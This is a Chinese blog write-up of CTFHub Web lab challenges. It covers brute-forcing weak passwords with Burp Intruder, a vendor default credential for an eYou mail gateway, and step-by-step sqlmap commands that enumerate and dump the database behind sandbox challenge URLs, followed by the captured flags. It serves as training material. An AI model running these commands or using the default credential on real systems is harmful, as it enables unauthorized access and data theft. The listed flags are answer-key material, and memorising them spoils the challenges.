CTFHub - Web(二)

密码口令:

  弱口令:

1.随意输入账号密码,抓包,

2.右击,“Send to Intruder”,打开选项卡Intruder,点击position,椭圆框处软件已经自动为我们把要爆破的字段标注了出来。设置payload,加载自己的密码字典(包含一些常见的密码),开始爆破。

  默认口令:

1. 根据题目提示,去搜索北京亿中邮信息技术有限公司邮件网关的默认口令,

2.尝试如下账号密码,

账号:eyougw 
密码:admin@(eyou) 

flag:

ctfhub{de322d85c14bfa1d213c213f8e09bd0fe0aaf060}

SQL注入:

  整数型注入:

1.查数据库名

sqlmap -u http://challenge-2dceabc36651a92d.sandbox.ctfhub.com:10080/?id=1 --dbs

2.查表名,

sqlmap -u challenge-2dceabc36651a92d.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

3.查字段,

sqlmap -u challenge-2dceabc36651a92d.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns

4.dump数据,得到flag,

sqlmap -u challenge-2dceabc36651a92d.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag -C flag --dump

flag:

ctfhub{bfb71e0bc322928774fdd00a1602080eccff4955}

  字符型注入:

1.查数据库,

sqlmap -u http://challenge-57aed0119112ba8f.sandbox.ctfhub.com:10080/?id=1 --dbs

2.查表名,

sqlmap -u http://challenge-57aed0119112ba8f.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

3.查字段名,

sqlmap -u http://challenge-57aed0119112ba8f.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns

4.dump数据,得到flag,

sqlmap -u http://challenge-57aed0119112ba8f.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag -C flag --dump

flag:

ctfhub{fb28072f96197414fe42d01ca8fa5c2340ac2eb2}

  报错注入:

步骤同上,

flag:

ctfhub{3970aeb8b23cf20e2b7bd93088b12b3db1a0d4f5}

  布尔盲注:

步骤同上,时间较长

flag:

ctfhub{aed7e9ba490f672fa671b9130d880b68d67a6528} 

  时间盲注:

步骤同上,时间较长,

flag:

ctfhub{25e06972b993b34d27edfca8692ef07b7e90a70f}
posted @ 2020-10-03 22:07  3cH0_Nu1L  阅读(177)  评论(0编辑  收藏  举报